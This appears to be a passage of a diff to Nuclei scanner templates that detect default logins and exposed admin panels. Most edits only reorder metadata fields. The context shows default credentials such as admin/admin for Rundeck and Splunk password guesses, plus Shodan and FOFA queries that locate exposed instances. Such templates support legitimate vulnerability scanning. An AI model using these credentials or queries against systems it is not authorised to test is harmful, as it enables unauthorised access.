+# digest: 4a0a00473045022100ced4e051d16f58cbefe47b2e6d4acfb6f917418ea7694c5248d757815146178f02200e8ff5e2a45e4224bf56d9e4d5a2bb7ec6ea6c15cbf45fcdaf10431d404c9481:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/others/inspur-clusterengine-default-login.yaml
+++ b/http/default-logins/others/inspur-clusterengine-default-login.yaml
@ -7,15 +7,15 @@ info:
  description: Inspur Clusterengine version 4 default admin login credentials were successful.
  reference:
    - https://blog.csdn.net/qq_36197704/article/details/115665793
-  metadata:
-    max-request: 1
-    fofa-query: title="TSCEV4.0"
-    product: clusterengine
-    vendor: inspur
-  tags: default-login,inspur,clusterengine
-
  classification:
    cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: inspur
+    product: clusterengine
+    fofa-query: title="TSCEV4.0"
+  tags: default-login,inspur,clusterengine
+
 http:
  - raw:
      - |
@ -50,4 +50,4 @@ http:
        status:
          - 200

-# digest: 4a0a0047304502205a0a7bfae8326d478cff4165b5e1b4ada8d48f6b796c9e9cb65310a6c673bc1b022100ec27eaa708bfd5944f619c4d517ba9b77f0064eff47c13c95da156b9477c7057:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205a0a7bfae8326d478cff4165b5e1b4ada8d48f6b796c9e9cb65310a6c673bc1b022100ec27eaa708bfd5944f619c4d517ba9b77f0064eff47c13c95da156b9477c7057:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/powerjob-default-login.yaml
+++ b/http/default-logins/powerjob-default-login.yaml
@ -8,17 +8,17 @@ info:
    PowerJob default login credentials were discovered.
  reference:
    - https://www.yuque.com/powerjob/guidence/trial
+  classification:
+    cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
+    vendor: powerjob
+    product: powerjob
    shodan-query: http.title:"PowerJob"
    fofa-query: title="PowerJob"
-    product: powerjob
-    vendor: powerjob
  tags: powerjob,default-login

-  classification:
-    cpe: cpe:2.3:a:powerjob:powerjob:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -51,4 +51,4 @@ http:
        status:
          - 200

-# digest: 4a0a00473045022100e0932bdfd3f0a186246164ab3130657f786b2085855c379a04ccfd23d996367d022008983aba06ca46d52608bddcdb44d48584b3570603c384713bdace7b95effb50:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e0932bdfd3f0a186246164ab3130657f786b2085855c379a04ccfd23d996367d022008983aba06ca46d52608bddcdb44d48584b3570603c384713bdace7b95effb50:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/pyload/pyload-default-login.yaml
+++ b/http/default-logins/pyload/pyload-default-login.yaml
@ -8,16 +8,16 @@ info:
    PyLoad Default Credentials were discovered.
  reference:
    - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20.
+  classification:
+    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: html:"pyload"
-    product: pyload
    vendor: pyload
+    product: pyload
+    shodan-query: html:"pyload"
  tags: default-login,pyload

-  classification:
-    cpe: cpe:2.3:a:pyload:pyload:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -47,4 +47,4 @@ http:
        status:
          - 302

-# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/rainloop/rainloop-default-login.yaml
+++ b/http/default-logins/rainloop/rainloop-default-login.yaml
@ -7,16 +7,16 @@ info:
  description: Rainloop WebMail default admin login credentials were successful.
  reference:
    - https://github.com/RainLoop/rainloop-webmail/issues/28
+  classification:
+    cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    fofa-query: app="RAINLOOP-WebMail"
-    product: webmail
    vendor: rainloop
+    product: webmail
+    fofa-query: app="RAINLOOP-WebMail"
  tags: default-login,rainloop,webmail,foss

-  classification:
-    cpe: cpe:2.3:a:rainloop:webmail:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -28,6 +28,7 @@ http:
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        Login={{user}}&Password={{pass}}&Action=AdminLogin&XToken={{token}}
+
    attack: pitchfork
    payloads:
      user:
@ -55,4 +56,4 @@ http:
        status:
          - 200

-# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022011d2ae91eff5020e269da659009bc07fbb88ab0ed413d851cef53af4fcbeb62902201e8b6d2a4e63b738161bf55d2099768df041004f0d36635923d28f1b70752a8b:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/rconfig-default-login.yaml
+++ b/http/default-logins/rconfig-default-login.yaml
@ -8,16 +8,16 @@ info:
    rConfig contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://github.com/rconfig/rconfig
+  classification:
+    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: http.title:"rConfig"
-    product: rconfig
    vendor: rconfig
+    product: rconfig
+    shodan-query: http.title:"rConfig"
  tags: rconfig,default-login

-  classification:
-    cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -58,4 +58,4 @@ http:
        status:
          - 200

-# digest: 490a0046304402200b64a3d2c28156acb0f4d1497199fce906e807ca0afd3d5fcc6b504f04d233da022023da45f54e216f07870e9ffdbe57b77a1e87d9ce512a9033b6920f22e10bfa3e:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200b64a3d2c28156acb0f4d1497199fce906e807ca0afd3d5fcc6b504f04d233da022023da45f54e216f07870e9ffdbe57b77a1e87d9ce512a9033b6920f22e10bfa3e:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/riello/netman-default-login.yaml
+++ b/http/default-logins/riello/netman-default-login.yaml
@ -8,17 +8,17 @@ info:
    Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
  reference:
    - https://www.riello-ups.com/
+  classification:
+    cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 1
+    vendor: riello-ups
+    product: netman_204_firmware
    shodan-query: title:"Netman"
    censys-query: services.http.response.body:"Netman204"
-    product: netman_204_firmware
-    vendor: riello-ups
  tags: default-login,netman

-  classification:
-    cpe: cpe:2.3:o:riello-ups:netman_204_firmware:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -45,4 +45,4 @@ http:
        status:
          - 200

-# digest: 4b0a00483046022100b566c3a1c77531131974bb1d1f4553f3a7a5e951c5918b21804652c643d32458022100aebdf668f07c2333d3a72dd90ea0575c484463d64a21c8791477f80269b1f235:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100b566c3a1c77531131974bb1d1f4553f3a7a5e951c5918b21804652c643d32458022100aebdf668f07c2333d3a72dd90ea0575c484463d64a21c8791477f80269b1f235:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/rundeck/rundeck-default-login.yaml
+++ b/http/default-logins/rundeck/rundeck-default-login.yaml
@ -9,16 +9,15 @@ info:
  reference:
    - https://raw.githubusercontent.com/karkis3c/bugbounty/main/nuclei-templates/default-login/rundeck-default-login.yaml
    - https://docs.rundeck.com/docs/learning/
+  classification:
+    cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    fofa-query: app="Rundeck-Login"
-    product: rundeck
    vendor: pagerduty
+    product: rundeck
+    fofa-query: app="Rundeck-Login"
  tags: default-login,rundeck
-
-  classification:
-    cpe: cpe:2.3:a:pagerduty:rundeck:*:*:*:*:*:*:*:*
 variables:
  username: admin
  password: admin
@ -31,7 +30,6 @@ http:
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        j_username={{username}}&j_password={{password}}
-
      - |
        GET /menu/home HTTP/1.1
        Host: {{Hostname}}
@ -48,4 +46,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022100fef40e31264843e21f89a843ba6f31f4109ca0016824152fbaf590c8371c9cc5022076659b8514e4eba7270ea5232d9f8545423a000bdf1274b7fc95aa9caa0cb968:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/softether/softether-vpn-default-login.yaml
+++ b/http/default-logins/softether/softether-vpn-default-login.yaml
@ -8,16 +8,16 @@ info:
    The administrative password for the SoftEther VPN Server is blank.
  reference:
    - https://www.softether.org/4-docs/1-manual/3._SoftEther_VPN_Server_Manual/3.3_VPN_Server_Administration#Administration_Authority_for_the_Entire_SoftEther_VPN_Server
+  classification:
+    cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"SoftEther VPN Server"
-    product: vpn
    vendor: softether
+    product: vpn
+    shodan-query: title:"SoftEther VPN Server"
  tags: misconfig,vpn,softether,default-login

-  classification:
-    cpe: cpe:2.3:a:softether:vpn:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -30,7 +30,7 @@ http:
      username:
        - administrator
      password:
-        - 
+        - null

    matchers-condition: and
    matchers:
@ -44,4 +44,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402205c1ef0dce69c50da55acaa53406c82710813d759723176e6ef4e4fee858b7bca02200b895a7367f4e624433a856e0dbf9d38de950d2d115ca5c5527c82ad81ba5394:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/splunk/splunk-default-login.yaml
+++ b/http/default-logins/splunk/splunk-default-login.yaml
@ -6,16 +6,16 @@ info:
  severity: high
  description: |
    Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+  classification:
+    cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 9
-    shodan-query: http.title:"Splunk"
-    product: splunk
    vendor: splunk
+    product: splunk
+    shodan-query: http.title:"Splunk"
  tags: default-login,splunk

-  classification:
-    cpe: cpe:2.3:a:splunk:splunk:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -47,9 +47,9 @@ http:
        - "admin"
        - "splunk"
        - "toor"
-
    stop-at-first-match: true
    host-redirects: true
+
    matchers-condition: and
    matchers:
      - type: word
@ -70,4 +70,5 @@ http:
        part: header
        regex:
          - 'cval=([0-9]+)'
-# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950
--- a/http/default-logins/wazuh-default-login.yaml
+++ b/http/default-logins/wazuh-default-login.yaml
@ -10,16 +10,16 @@ info:
    - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
    - https://wazuh.com
    - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
+  classification:
+    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
-    shodan-query: "title:\"Wazuh\""
-    product: wazuh
    vendor: wazuh
+    product: wazuh
+    shodan-query: "title:\"Wazuh\""
  tags: wazuh,default-login

-  classification:
-    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -73,4 +73,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a004730450221009455b6beb3dd3660a1acfbfb547e2a94b8160fcbf9501c51f246568d7d26b21702204c46b154f7b28cad6aa4a6fc66515aff039e95ba59642d2b70729598de351bdb:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/acti-panel.yaml
+++ b/http/exposed-panels/acti-panel.yaml
@ -4,17 +4,17 @@ info:
  name: ACTi Video Monitoring Panel - Detection
  author: DhiyaneshDk
  severity: info
+  classification:
+    cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
+    vendor: acti
+    product: camera_firmware
    shodan-query: title:"Web Configurator" html:"ACTi"
    fofa-query: app="ACTi-视频监控"
-    product: camera_firmware
-    vendor: acti
  tags: acti,panel,login,detect

-  classification:
-    cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -32,4 +32,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a0046304402202ff45925f682afb5561ce24b6edb6a297d24f4b8bb8e68ddaa8f74ebb6bdf51202201064bc5389f172c1cce1197e8715c77af9f209193cc6b3a7b4f0965cb0183303:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/adguard-panel.yaml
+++ b/http/exposed-panels/adguard-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    AdGuard panel has been detected.
-  metadata:
-    max-request: 1
-    verified: true
-    fofa-query: title="AdGuard Home"
-    product: adguard
-    vendor: adguard
-  tags: adguard,panel,login,detect
-
  classification:
    cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: adguard
+    product: adguard
+    fofa-query: title="AdGuard Home"
+  tags: adguard,panel,login,detect
+
 http:
  - method: GET
    path:
@ -34,4 +34,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220730adc9fcdcc4df45177d9cfab02b37df33d1945732441c4dac5811faf288eb902206f66cb45c1b423bfe9a4e9511d534b50f575855c1f5c26bf533e3a81db6fe63c:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/airos-panel.yaml
+++ b/http/exposed-panels/airos-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    AirOS panel was detected.
+  classification:
+    cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: "http.favicon.hash:-697231354"
-    product: airos
    vendor: ui
+    product: airos
+    shodan-query: "http.favicon.hash:-697231354"
  tags: airos,panel

-  classification:
-    cpe: cpe:2.3:o:ui:airos:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -31,4 +31,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022029f1587f6c760a398c179915decdd1c6f7492d915a4cda673ba9be590756dc5802207e0d46fae9185acbfe36d2c9bea4822152a5ea03b718f73fd56f17bf2d7ec4c5:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/apache/apache-apollo-panel.yaml
+++ b/http/exposed-panels/apache/apache-apollo-panel.yaml
@ -4,16 +4,16 @@ info:
  name: Apache Apollo Panel - Detect
  author: ritikchaddha
  severity: info
+  classification:
+    cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Apache Apollo"
-    product: activemq_apollo
    vendor: apache
+    product: activemq_apollo
+    shodan-query: title:"Apache Apollo"
  tags: panel,apache,apollo,login,detect

-  classification:
-    cpe: cpe:2.3:a:apache:activemq_apollo:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -29,4 +29,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502210091d96867344b35c42563552bc564b4182466d6cac4abee2d338984b6e1cdd7d6022074f11714cb13bb709904658251bcccfdc4edba265448bd850d731a800f148d77:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/aspcms-backend-panel.yaml
+++ b/http/exposed-panels/aspcms-backend-panel.yaml
@ -8,16 +8,16 @@ info:
    ASPcms /plug/oem/AspCms_OEMFun.asp leak backend url.
  reference:
    - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json
+  classification:
+    cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    fofa-query: app="ASPCMS"
-    product: aspcms
    vendor: asp4cms
+    product: aspcms
+    fofa-query: app="ASPCMS"
  tags: panel,login,aspcms,admin

-  classification:
-    cpe: cpe:2.3:a:asp4cms:aspcms:*:*:*:*:*:*:*:*
 http:
  - raw:
      - |
@ -40,4 +40,5 @@ http:
          - 'status_code_1 == 200 && contains(body_1,"alert(")'
          - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")'
        condition: and
-# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a004630440220234479820f4cc17b655263c9954725359c7d3dcb06092d722a81fa09cc027c2d02204e2d96c6500cad3ed9161ad8d9b391630442e9f68ac7cc0dfc0332a2c71de186:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/atlassian-bamboo-panel.yaml
+++ b/http/exposed-panels/atlassian-bamboo-panel.yaml
@ -8,16 +8,16 @@ info:
    Atlassian Bamboo login panel was detected.
  reference:
    - https://www.atlassian.com/software/bamboo
+  classification:
+    cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: http.title:"Bamboo"
-    product: bamboo
    vendor: atlassian
+    product: bamboo
+    shodan-query: http.title:"Bamboo"
  tags: panel,bamboo,login,detect

-  classification:
-    cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -45,4 +45,5 @@ http:
        regex:
          - 'version\s+([0-9A-Za-z\s\.]+)\s+-'
          - 'pvpVersion = "([a-z0-9.]+)";'
-# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022077379f6cb3ccaffdd11f65581956ef6b17ad1721484cb296df66e78d4c9948af022046cc1693337f88f3eff468bb4785c6cc8065c3633a1edf960d6310d6620862c7:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/audiobookshelf-panel.yaml
+++ b/http/exposed-panels/audiobookshelf-panel.yaml
@ -6,6 +6,8 @@ info:
  severity: info
  reference:
    - https://github.com/advplyr/audiobookshelf
+  classification:
+    cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
@ -14,8 +16,6 @@ info:
    vendor: audiobookshelf
  tags: panel,audiobookshelf,detect

-  classification:
-    cpe: cpe:2.3:a:audiobookshelf:audiobookshelf:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
--- a/http/exposed-panels/authelia-panel.yaml
+++ b/http/exposed-panels/authelia-panel.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/authelia/authelia
    - https://www.authelia.com/
+  classification:
+    cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Login - Authelia"
-    product: authelia
    vendor: authelia
+    product: authelia
+    shodan-query: title:"Login - Authelia"
  tags: login,panel,authelia

-  classification:
-    cpe: cpe:2.3:a:authelia:authelia:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -33,4 +33,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022011c652c8e4ad3e46de531e029c3bcd7fe019a1f7ef8a71aa7ef87b3d039c60d4022034538df50b7e165e8d36b3bbcb858d44a935fa2bc1592669221f17de9e1f0b50:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/beyondtrust-priv-panel.yaml
+++ b/http/exposed-panels/beyondtrust-priv-panel.yaml
@ -8,16 +8,16 @@ info:
    BeyondTrust Privileged Remote Access login panel was detected.
  reference:
    - https://www.beyondtrust.com/products/privileged-remote-access
+  classification:
+    cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\""
-    product: privileged_remote_access
    vendor: beyondtrust
+    product: privileged_remote_access
+    shodan-query: "http.html:\"BeyondTrust Privileged Remote Access Login\""
  tags: panel,beyondtrust,login,detect

-  classification:
-    cpe: cpe:2.3:a:beyondtrust:privileged_remote_access:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -25,11 +25,11 @@ http:
      - "{{BaseURL}}/login/pre_login_agreement"

    stop-at-first-match: true
-
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_any(to_lower(body), "<title>beyondtrust privileged remote access login", "privileged-remote-access") && contains(to_lower(body), "login")'
        condition: and
-# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022028b4e01a5b67ca4c729f2f8622b5c4d5f37790ab986c7391d5d051b04c4f6f68022050105cc6f641dcc0a83e084ff5079d19f2afc6602415776f329ed7cb90fb8192:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/bonobo-server-panel.yaml
+++ b/http/exposed-panels/bonobo-server-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    Bonobo Git Server login panel was detected.
+  classification:
+    cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: http.favicon.hash:-219625874
-    product: bonobo_git_server
    vendor: bonobogitserver
+    product: bonobo_git_server
+    shodan-query: http.favicon.hash:-219625874
  tags: panel,bonobo,git,login,detect

-  classification:
-    cpe: cpe:2.3:a:bonobogitserver:bonobo_git_server:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -24,8 +24,8 @@ http:

    host-redirects: true
    max-redirects: 2
-
    stop-at-first-match: true
+
    matchers-condition: and
    matchers:
      - type: word
@ -42,4 +42,5 @@ http:
        group: 1
        regex:
          - '(?i)bonobo git server \((.*)\)'
-# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a00473045022018f4fb6f144e0c0797a0dbd56483a50d32639f079141a0ff0928451deb1f45600221008ee83aa47cad2848439cf9632a05c14c34ba0bb36afd80a31809ce7cbb5f638f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/busybox-repository-browser.yaml
+++ b/http/exposed-panels/busybox-repository-browser.yaml
@ -8,16 +8,16 @@ info:
    Busybox Repository Browser was detected.
  reference:
    - https://github.com/mirror/busybox
+  classification:
+    cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: title="Busybox Repository Browser"
-    product: busybox
    vendor: busybox
+    product: busybox
+    fofa-query: title="Busybox Repository Browser"
  tags: detect,busybox,oss,panel

-  classification:
-    cpe: cpe:2.3:a:busybox:busybox:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -35,4 +35,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950
+
+# digest: 4b0a00483046022100d6a1f10acac0f712eb8ee9719f6f081cc8e937cb4f32885c4dc5f71a78282cd2022100cb07961a60db5dfb12cd6497f3e120d56f7d3646c283ebde7f883d4b9efe9b0f:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/c2/caldera-c2.yaml
+++ b/http/exposed-panels/c2/caldera-c2.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/mitre/caldera
    - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+  classification:
+    cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    fofa-query: http.favicon.hash:-636718605
-    product: caldera
    vendor: mitre
+    product: caldera
+    fofa-query: http.favicon.hash:-636718605
  tags: c2,ir,osint,caldera,panel

-  classification:
-    cpe: cpe:2.3:a:mitre:caldera:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -34,4 +34,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950
+
+# digest: 4a0a0047304502202ed3136e5c5f63eab633746afb7d795c109d100fadcb51118322c2daf931a791022100a444d8fffaa58aa50a471e4dd3568c359d6f3dbcfa5ac74879ca34b2fbc6c71b:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/changedetection-panel.yaml
+++ b/http/exposed-panels/changedetection-panel.yaml
@ -9,16 +9,16 @@ info:
  reference:
    - https://github.com/dgtlmoon/changedetection.io
    - https://changedetection.io/
+  classification:
+    cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
-    shodan-query: title:"Change Detection"
-    product: changedetection
    vendor: changedetection
+    product: changedetection
+    shodan-query: title:"Change Detection"
  tags: panel,changedetection,detect

-  classification:
-    cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*
 http:
  - method: GET
    path:
@ -37,4 +37,5 @@ http:
      - type: status
        status:
          - 200
-# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950
+
+# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950
--- a/http/exposed-panels/cisco-unity-panel.yaml
+++ b/http/exposed-panels/cisco-unity-panel.yaml
@ -6,16 +6,16 @@ info:
  severity: info
  description: |
    A Cisco Unity Connection instance was detected.
+  classification:
+    cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
-    shodan-query: html:"Cisco Unity Connection"
-    product: unity_connection
    vendor: cisco
+    product: unity_connection
+    shodan-query: html:"Cisco Unity Connection"
  tags: panel,cisco,unity,login,detect

-  classification:
